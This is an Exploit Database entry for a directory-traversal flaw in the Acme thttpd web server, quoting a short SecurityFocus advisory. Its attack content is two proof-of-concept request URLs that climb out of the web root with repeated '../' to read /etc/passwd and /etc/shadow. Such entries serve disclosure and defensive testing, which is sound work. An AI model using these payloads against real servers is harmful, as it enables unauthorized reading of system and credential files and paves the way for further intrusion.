Acme thttpd HTTP Server - Directory Traversal

EDB-ID:

38522

CVE:

N/A




Platform:

Linux

Date:

2013-05-19


source: https://www.securityfocus.com/bid/60010/info

thttpd is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue will allow an attacker to view arbitrary local files within the context of the web server. Information harvested may aid in launching further attacks. 

www.example.com/../../../../../../../../etc/passwd

www.example.com/../../../../../../../../etc/shadow